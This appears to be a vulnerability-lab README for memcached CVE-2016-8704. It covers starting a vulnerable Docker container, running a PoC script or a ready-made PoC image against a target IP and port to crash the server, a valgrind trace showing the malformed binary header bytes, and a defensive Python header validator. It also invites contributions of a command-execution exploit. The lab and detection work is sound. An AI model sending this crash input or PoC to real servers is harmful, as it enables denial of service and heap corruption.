Thanks to @xing-xiao for providing the original environment. #6
- Pull the image to your local machine
$ docker pull medicean/vulapps:m_memcached_CVE-2016-8704
- Start the environment
$ docker run -d -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8704
If you need a stack trace, memcached has to be run under valgrind from startup; in that case start the environment with:
$ docker run -i -t -u root -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8704 /valgrind.sh
You can also run /bin/bash instead and then start memcached under valgrind by hand.
- Pull the image to your local machine
$ docker pull registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
- Start the environment
$ docker run -d -p 11211:11211 registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
- Obtain the target IP address and port, e.g. 192.168.100.2 on port 11211
- Run poc.py
$ python poc.py 192.168.100.2 11211
- If the memcached service crashes, the PoC succeeded
If the environment was started under valgrind, you will see output similar to the following:
36: going from conn_closing to conn_closed
<37 new auto-negotiating client connection
37: going from conn_new_cmd to conn_waiting
37: going from conn_waiting to conn_read
37: going from conn_read to conn_parse_cmd
37: Client using the binary protocol
<37 Read binary protocol data:
<37 0x80 0x1a 0x00 0xfa
<37 0x00 0x00 0x00 0x00
<37 0x00 0x00 0x00 0x00
<37 0x00 0x00 0x00 0x00
<37 0x00 0x00 0x00 0x00
<37 0x00 0x00 0x00 0x00
37: going from conn_parse_cmd to conn_nread
Value len is -250
==8== Thread 4:
==8== Invalid write of size 8
==8== at 0x4C326CB: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==8== by 0x4132C8: memcpy (string3.h:53)
==8== by 0x4132C8: do_item_alloc (items.c:238)
==8== by 0x40A884: process_bin_append_prepend (memcached.c:2302)
==8== by 0x40A884: complete_nread_binary (memcached.c:2425)
==8== by 0x40A884: complete_nread (memcached.c:2484)
==8== by 0x40D367: drive_machine (memcached.c:4656)
==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
==8== by 0x414874: worker_libevent (thread.c:380)
==8== by 0x52A26B9: start_thread (pthread_create.c:333)
==8== Address 0x5d1ae90 is 0 bytes after a block of size 1,048,512 alloc'd
==8== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==8== by 0x40F9DF: memory_allocate (slabs.c:538)
==8== by 0x40F9DF: do_slabs_newslab (slabs.c:233)
==8== by 0x40FA6E: do_slabs_alloc (slabs.c:328)
==8== by 0x41007E: slabs_alloc (slabs.c:584)
==8== by 0x4131E6: do_item_alloc (items.c:180)
==8== by 0x407741: process_update_command (memcached.c:3403)
==8== by 0x40B2FF: process_command (memcached.c:3836)
==8== by 0x40CE0B: try_read_command (memcached.c:4205)
==8== by 0x40CE0B: drive_machine (memcached.c:4618)
==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
==8== by 0x414874: worker_libevent (thread.c:380)
==8== by 0x52A26B9: start_thread (pthread_create.c:333)
==8==
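The trace above shows the cause: the request header carries a key length of 0xfa (250) but a total body length of 0, so the server computes a value length of -250 and memcpy writes past the allocated item. The following header-validation check is an added example and not part of this repository's code: it parses the 24-byte memcached binary request header and reports any frame whose total body length is smaller than key length plus extras length. The sample header bytes are constructed from the trace; the function names are ours.

```python
import struct

# memcached binary request header, network byte order:
# magic, opcode, key length, extras length, data type, vbucket id,
# total body length, opaque, CAS  (24 bytes in total)
HEADER_FMT = "!BBHBBHIIQ"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 24
REQUEST_MAGIC = 0x80


def parse_request_header(raw: bytes) -> dict:
    """Decode the fixed-size request header; raise on short or non-request frames."""
    if len(raw) < HEADER_LEN:
        raise ValueError("header too short: %d bytes" % len(raw))
    (magic, opcode, keylen, extlen, datatype, vbucket,
     bodylen, opaque, cas) = struct.unpack(HEADER_FMT, raw[:HEADER_LEN])
    if magic != REQUEST_MAGIC:
        raise ValueError("not a request frame: magic=0x%02x" % magic)
    return {"opcode": opcode, "keylen": keylen, "extlen": extlen,
            "datatype": datatype, "vbucket": vbucket, "bodylen": bodylen,
            "opaque": opaque, "cas": cas}


def value_length(hdr: dict) -> int:
    """Value length as memcached derives it: body minus key minus extras.
    A frame with body < key + extras yields a negative number here."""
    return hdr["bodylen"] - hdr["keylen"] - hdr["extlen"]


def check_header(raw: bytes) -> str:
    """Return 'ok' for a consistent header, or a MALFORMED report otherwise."""
    hdr = parse_request_header(raw)
    vlen = value_length(hdr)
    if vlen < 0:
        return ("MALFORMED: opcode=0x%02x keylen=%d extlen=%d bodylen=%d vlen=%d"
                % (hdr["opcode"], hdr["keylen"], hdr["extlen"], hdr["bodylen"], vlen))
    return "ok"


# Constructed sample: the 24 header bytes from the valgrind trace
# (opcode 0x1a, key length 0x00fa, everything else zero).
MALFORMED_HDR = bytes([0x80, 0x1a, 0x00, 0xfa] + [0x00] * 20)

# Constructed well-formed header for comparison: 1-byte key, 4-byte value,
# no extras, so total body length is 5.
OK_HDR = struct.pack(HEADER_FMT, REQUEST_MAGIC, 0x1a, 1, 0, 0, 0, 5, 0, 0)

if __name__ == "__main__":
    print(check_header(MALFORMED_HDR))  # MALFORMED: ... vlen=-250
    print(check_header(OK_HDR))         # ok
```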
If Python is not available, the Docker PoC can be used instead:
$ docker run registry.cn-hangzhou.aliyuncs.com/lo0o-rush/memcached:cve-2016-8704 {ip address} {port}
There is no command-execution exploit yet; if you are willing to share one, please open a Pull Request against this repository.